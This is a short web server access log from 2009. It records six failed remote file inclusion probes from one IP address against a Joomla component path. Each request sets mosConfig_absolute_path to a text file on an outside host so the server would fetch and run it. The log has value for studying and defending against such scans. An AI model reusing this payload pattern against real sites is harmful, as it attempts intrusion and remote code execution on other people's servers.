211.202.2.220 - - [13/Mar/2009:03:43:36 -0500] "GET /logs/access_log.1217289600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:36 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:36 -0500] "GET /logs/access_log.1216425600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:36 -0500] "GET /logs/access_log.1216425600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:37 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:37 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
